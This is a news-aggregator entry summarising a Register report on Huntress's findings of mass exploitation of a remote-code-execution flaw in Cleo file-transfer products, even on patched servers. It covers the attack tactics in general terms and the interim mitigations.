Source URL: https://www.theregister.com/2024/12/10/cleo_vulnerability/
Source: The Register
Title: Fully patched Cleo products under renewed ‘zero-day-ish’ mass attack
Feedly Summary: Thousands of servers targeted while customers wait for patches
Researchers at security shop Huntress are seeing mass exploitation of a vulnerability affecting three Cleo file management products, even on patched systems.…
AI Summary and Description: Yes
Summary: Researchers from Huntress have reported a widespread exploitation of a vulnerability (CVE-2024-50623) in three Cleo file management products, even on systems that had been patched. The researchers observed attacks on over 1,700 servers and believe that the number of compromised systems could be significantly higher due to the use of stealthy methods by attackers.
Detailed Description:
– **Vulnerability Overview**:
– The vulnerability (CVE-2024-50623) is an unauthenticated remote code execution (RCE) flaw affecting Cleo’s file management products: Harmony, VLTrader, and LexiCom, specifically the 5.8.0.21 version.
– Despite Cleo issuing patches in October 2024, attackers are exploiting the vulnerability, leading Huntress to describe the situation as “zero-day-ish” due to the novel nature of the exploit, even though it was supposed to be patched.
– **Extent of Exploitation**:
– Huntress observed more than 1,700 Cleo servers being targeted, with indications that many more could be at risk.
– At least 10 Cleo customers across various industries, including consumer products, food services, trucking, and shipping, are believed to have been compromised.
– **Threat Landscape**:
– The exploit’s similarity to the previously exploited MOVEit MFT product has raised alarms among security experts, suggesting a coordinated effort to target Cleo’s products.
– **Technical Execution of the Attack**:
– Attackers leverage autorun files, immediately deleted post-execution, to maintain stealth.
– Malicious PowerShell commands are executed, with external IP addresses contacted to retrieve JAR files, which serve as webshells for persistent access.
– Threat actors were noted to be enumerating Active Directory assets, indicating further attempts to elevate privileges.
– **Mitigation Recommendations**:
– Huntress has advised Cleo customers to place affected servers behind firewalls as an interim protective measure while awaiting updated patches from Cleo.
– Users are also recommended to delete the “Autorun Directory” field from their software configurations to reduce exposure, although this does not entirely mitigate the potential for arbitrary file modification.
– **Response and Future Actions**:
– Huntress has communicated its findings to Cleo, who has indicated the need for an urgent update to their patches.
– Ongoing exploitation risks remain until the new patches are released.
This incident serves as a critical reminder of the importance of timely patch management and the potential for significant security breaches even in systems thought to be secure. Security professionals in AI, cloud, and infrastructure should be particularly aware of the tactics used for remote code execution and the need for a robust incident response plan.